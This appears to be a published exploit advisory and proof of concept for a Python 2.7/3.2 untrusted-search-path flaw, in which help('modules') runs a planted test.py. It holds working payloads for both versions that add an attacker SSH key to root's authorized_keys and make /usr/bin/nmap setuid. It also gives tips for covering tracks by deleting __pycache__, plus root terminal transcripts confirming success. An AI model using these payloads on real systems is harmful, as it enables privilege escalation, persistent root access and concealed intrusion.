# Exploit Title: Python untrusted search path/code execution vulnerability
|
|
# Date: 7.6.12
|
|
# Exploit Author: rogueclown
|
|
# Vendor Homepage: http://www.python.org
|
|
# Software Link: http://www.python.org/getit/releases/
|
|
# Version: python 2.7.2 and python 3.2.1
|
|
# Tested on: linux (my test machine was OpenSUSE 12.1)
|
|
#
|
|
# This is an expansion on www.exploit-db.com/exploits/19523/ -- a big thanks,
|
|
# and the lion's share of the credit, to ShadowHatesYou (Shadow@SquatThis.net).
|
|
# They found the vulnerability; i just found a more generalized application
|
|
# of it.
|
|
#
|
|
# Basically, i found that it's not just python-wrapper that executes a test.py
# script within the current working directory when help('modules') is run --
# python itself does that: help('modules') loads every module it can find on
# sys.path, and in an interactive session the working directory is on
# sys.path, so a test.py sitting there gets executed. In python 2, it works
# just as ShadowHatesYou showed it in his python-wrapper exploit.
|
|
#
|
|
# This still works in python 3, but you have to do a bit more to cover your
|
|
# tracks. In the working directory, python 3 drops a __pycache__ directory
|
|
# with a .pyc file inside it. Most of the bytecode in there is not human
|
|
# readable, but it displays the shell command called by the script in
|
|
# plaintext, making it pretty obvious that something funny happened. However,
|
|
# you can get around this by making sure that your test.py script removes the
|
|
# __pycache__ directory from the working directory.
|
|
#
|
|
# rogueclown
|
|
# rogueclown@rogueclown.net
|
|
# 7.6.12
|
|
|
|
############
|
|
# PYTHON 2 #
|
|
############
|
|
|
|
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
|
|
-rw-r--r-- 1 adalia users 144 Jul 4 15:47 test.py
|
|
adalia@bukkit:~/security/pythonwrapper> cat test.py
|
|
#!/usr/bin/python
# Proof-of-concept payload from the advisory above: a test.py left in the
# working directory is executed when a more privileged user runs
# help('modules') from that directory (see the transcript that follows).

import os

# Runs with the privileges of whoever invoked help('modules'); in the
# transcript below that is root. Post-incident artifacts a defender can look
# for: an unexpected entry appended to /root/.ssh/authorized_keys and the
# setuid bit (mode 4755) on /usr/bin/nmap.
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap")
|
|
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
|
|
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
|
|
adalia@bukkit:~/security/pythonwrapper> su
|
|
Password:
|
|
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
|
|
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
|
|
bukkit:/home/adalia/security/pythonwrapper # python
|
|
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
|
|
Type "help", "copyright", "credits" or "license" for more information.
|
|
>>> help('modules')
|
|
|
|
Please wait a moment while I gather a list of all available modules...
|
|
|
|
|
|
/usr/lib64/python2.7/site-packages/gobject/constants.py:24: Warning: g_boxed_type_register_static: assertion `g_type_from_name (name) == 0' failed
|
|
import gobject._gobject
|
|
/usr/lib64/python2.7/site-packages/twisted/words/im/__init__.py:8: UserWarning: twisted.im will be undergoing a rewrite at some point in the future.
|
|
warnings.warn("twisted.im will be undergoing a rewrite at some point in the future.")
|
|
** Message: pygobject_register_sinkfunc is deprecated (GstObject)
|
|
Alacarte abc gtkunixprint readline
|
|
BaseHTTPServer aifc gzip repr
|
|
Bastion antigravity hashlib resource
|
|
BeautifulSoup anydbm heapq rexec
|
|
BeautifulSoupTests argparse hmac rfc822
|
|
CDROM array hotshot rlcompleter
|
|
CGIHTTPServer ast hpmudext robotparser
|
|
ConfigParser asynchat htmlentitydefs rpm
|
|
Cookie asyncore htmllib runpy
|
|
Crypto atexit httplib satsolver
|
|
DLFCN atk httplib2 scanext
|
|
DocXMLRPCServer atom ieee1284 sched
|
|
HTMLParser audiodev ihooks scout
|
|
IN base64 imaplib select
|
|
MimeWriter bdb imghdr serial
|
|
OpenSSL beaker imp sets
|
|
PAM binascii importlib setuptools
|
|
PyQt4 binhex imputil sgmllib
|
|
Queue bisect inspect sha
|
|
SimpleHTTPServer bsddb io shelve
|
|
SimpleXMLRPCServer butterfly itertools shlex
|
|
SocketServer bz2 json shutil
|
|
StringIO cPickle keyword signal
|
|
TYPES cProfile lib2to3 simplejson
|
|
UserDict cStringIO libproxy sip
|
|
UserList cairo libvboxjxpcom site
|
|
UserString calendar libxml2 smbc
|
|
VBoxAuth cgi libxml2mod smtpd
|
|
VBoxAuthSimple cgitb linecache smtplib
|
|
VBoxDD chunk linuxaudiodev sndhdr
|
|
VBoxDD2 cmath locale socket
|
|
VBoxDDU cmd logging spwd
|
|
VBoxDbg code louie sqlite3
|
|
VBoxGuestControlSvc codecs macpath sre
|
|
VBoxGuestPropSvc codeop macurl2path sre_compile
|
|
VBoxHeadless coherence mad sre_constants
|
|
VBoxKeyboard collections mailbox sre_parse
|
|
VBoxNetDHCP colorsys mailcap ssl
|
|
VBoxOGLhostcrutil commands mako stat
|
|
VBoxOGLhosterrorspu compileall markupbase statvfs
|
|
VBoxOGLrenderspu compiler markupsafe string
|
|
VBoxPython contextlib marshal stringold
|
|
VBoxPython2_7 cookielib math stringprep
|
|
VBoxREM copy md5 strop
|
|
VBoxRT copy_reg mhlib struct
|
|
VBoxSDL crypt mimetools subprocess
|
|
VBoxSharedClipboard csv mimetypes sunau
|
|
VBoxSharedCrOpenGL ctypes mimify sunaudio
|
|
VBoxSharedFolders cups mmap symbol
|
|
VBoxVMM cupsext modulefinder symtable
|
|
VBoxXPCOM cupshelpers multifile sys
|
|
VBoxXPCOMC curl multiprocessing sysconfig
|
|
VirtualBox datetime mutagen syslog
|
|
Xlib dbhash mutex tabnanny
|
|
_LWPCookieJar dbus mygpoclient tarfile
|
|
_MozillaCookieJar dbus_bindings netrc telepathy
|
|
__builtin__ decimal new telnetlib
|
|
__future__ difflib nis tempfile
|
|
_abcoll dircache nntplib termios
|
|
_ast dis ntpath textwrap
|
|
_bisect distutils nturl2path this
|
|
_bsddb doctest numbers thread
|
|
_codecs drv_libxml2 numpy threading
|
|
_codecs_cn dsextras opcode time
|
|
_codecs_hk dumbdbm operator timeit
|
|
_codecs_iso2022 dummy_thread optparse toaiff
|
|
_codecs_jp dummy_threading os token
|
|
_codecs_kr easy_install os2emxpath tokenize
|
|
_codecs_tw email ossaudiodev trace
|
|
_collections encodings packagekit traceback
|
|
_csv errno pango tty
|
|
_ctypes exceptions pangocairo twisted
|
|
_ctypes_test eyeD3 papyon types
|
|
_dbus_bindings fcntl parser unicodedata
|
|
_dbus_glib_bindings feedparser pcardext unittest
|
|
_elementtree filecmp pdb uno
|
|
_functools fileinput pickle unohelper
|
|
_hashlib fnmatch pickletools urlgrabber
|
|
_heapq formatter pipes urllib
|
|
_hotshot fpformat pkg_resources urllib2
|
|
_io fractions pkgutil urlparse
|
|
_json ftplib platform user
|
|
_locale functools plistlib uu
|
|
_lsprof future_builtins popen2 uuid
|
|
_md5 gc poplib vboxapi
|
|
_multibytecodec gdata posix vboxshell
|
|
_multiprocessing genericpath posixfile volkeys
|
|
_pyio getopt posixpath warnings
|
|
_random getpass pprint wave
|
|
_satsolver gettext profile weakref
|
|
_sha gi pstats webbrowser
|
|
_sha256 gio pty whichdb
|
|
_sha512 glib pwd wsgiref
|
|
_socket glob py_compile xdg
|
|
_sqlite3 gmenu pyclbr xdrlib
|
|
_sre gnome_sudoku pycurl xml
|
|
_ssl gnomekeyring pydoc xmllib
|
|
_strptime gobject pydoc_data xmlrpclib
|
|
_struct gpod pyexpat xxsubtype
|
|
_symtable gpodder pygst zeitgeist
|
|
_testcapi grp pygtk zipfile
|
|
_threading_local gst pynotify zipimport
|
|
_warnings gstoption quopri zlib
|
|
_weakref gtk random zope
|
|
_weakrefset gtktrayicon re
|
|
|
|
Enter any module name to get more help. Or, type "modules spam" to search
|
|
for modules whose descriptions contain the word "spam".
|
|
|
|
>>> exit()
|
|
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
|
|
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
|
|
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
|
|
ssh-rsa rogueclown washere
|
|
bukkit:/home/adalia/security/pythonwrapper #
|
|
|
|
|
|
############
|
|
# PYTHON 3 #
|
|
############
|
|
|
|
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
|
|
-rw-r--r-- 1 adalia users 169 Jul 4 15:51 test.py
|
|
adalia@bukkit:~/security/pythonwrapper> cat test.py
|
|
#!/usr/bin/python
# Python 3 variant of the proof-of-concept payload above: same effect as the
# Python 2 version, executed when a more privileged user runs help('modules')
# from the directory that holds this test.py.

import os

# Runs with the privileges of whoever invoked help('modules'); in the
# transcript below that is root. The trailing rm deletes the __pycache__
# directory that Python 3 writes next to test.py, whose .pyc would otherwise
# contain this command string in plaintext (see the header notes). For an
# investigator, the appended authorized_keys entry and the setuid bit on
# /usr/bin/nmap remain as artifacts even after __pycache__ is gone.
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap; /bin/rm -rf __pycache__")
|
|
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
|
|
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
|
|
adalia@bukkit:~/security/pythonwrapper> su
|
|
Password:
|
|
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
|
|
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
|
|
bukkit:/home/adalia/security/pythonwrapper # python3
|
|
Python 3.2.1 (default, Jul 18 2011, 16:24:40) [GCC] on linux2
|
|
Type "help", "copyright", "credits" or "license" for more information.
|
|
>>> help('modules')
|
|
|
|
Please wait a moment while I gather a list of all available modules...
|
|
|
|
|
|
CDROM binascii inspect shelve
|
|
DLFCN binhex io shlex
|
|
IN bisect itertools shutil
|
|
TYPES builtins json signal
|
|
__future__ bz2 keyword site
|
|
_abcoll cProfile linecache smtpd
|
|
_ast calendar locale smtplib
|
|
_bisect cgi logging sndhdr
|
|
_codecs cgitb macpath socket
|
|
_codecs_cn chunk macurl2path socketserver
|
|
_codecs_hk cmath mailbox spwd
|
|
_codecs_iso2022 cmd mailcap sqlite3
|
|
_codecs_jp code marshal sre_compile
|
|
_codecs_kr codecs math sre_constants
|
|
_codecs_tw codeop mimetypes sre_parse
|
|
_collections collections mmap ssl
|
|
_compat_pickle colorsys modulefinder stat
|
|
_csv compileall multiprocessing string
|
|
_ctypes concurrent netrc stringprep
|
|
_datetime configparser nis struct
|
|
_dummy_thread contextlib nntplib subprocess
|
|
_elementtree copy ntpath sunau
|
|
_functools copyreg nturl2path symbol
|
|
_hashlib crypt numbers symtable
|
|
_heapq csv opcode sys
|
|
_io ctypes operator sysconfig
|
|
_json datetime optparse syslog
|
|
_locale decimal os tabnanny
|
|
_lsprof difflib os2emxpath tarfile
|
|
_markupbase dis ossaudiodev telnetlib
|
|
_multibytecodec distutils parser tempfile
|
|
_multiprocessing doctest pdb termios
|
|
_pickle dummy_threading pickle textwrap
|
|
_posixsubprocess email pickletools this
|
|
_pyio encodings pipes threading
|
|
_random errno pkgutil time
|
|
_socket fcntl platform timeit
|
|
_sqlite3 filecmp plistlib token
|
|
_sre fileinput poplib tokenize
|
|
_ssl fnmatch posix trace
|
|
_string formatter posixpath traceback
|
|
_strptime fractions pprint tty
|
|
_struct ftplib profile turtle
|
|
_symtable functools pstats types
|
|
_thread gc pty unicodedata
|
|
_threading_local genericpath pwd unittest
|
|
_warnings getopt py_compile urllib
|
|
_weakref getpass pyclbr uu
|
|
_weakrefset gettext pydoc uuid
|
|
abc glob pydoc_data warnings
|
|
aifc grp queue wave
|
|
antigravity gzip quopri weakref
|
|
argparse hashlib random webbrowser
|
|
array heapq re wsgiref
|
|
ast hmac readline xdrlib
|
|
asynchat html reprlib xxlimited
|
|
asyncore http resource xxsubtype
|
|
atexit imaplib rlcompleter zipfile
|
|
audioop imghdr runpy zipimport
|
|
base64 imp sched zlib
|
|
bdb importlib select
|
|
|
|
Enter any module name to get more help. Or, type "modules spam" to search
|
|
for modules whose descriptions contain the word "spam".
|
|
|
|
>>> exit()
|
|
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
|
|
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
|
|
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
|
|
ssh-rsa rogueclown washere
|
|
bukkit:/home/adalia/security/pythonwrapper # ls __pycache__
|
|
ls: cannot access __pycache__: No such file or directory
|
|
bukkit:/home/adalia/security/pythonwrapper #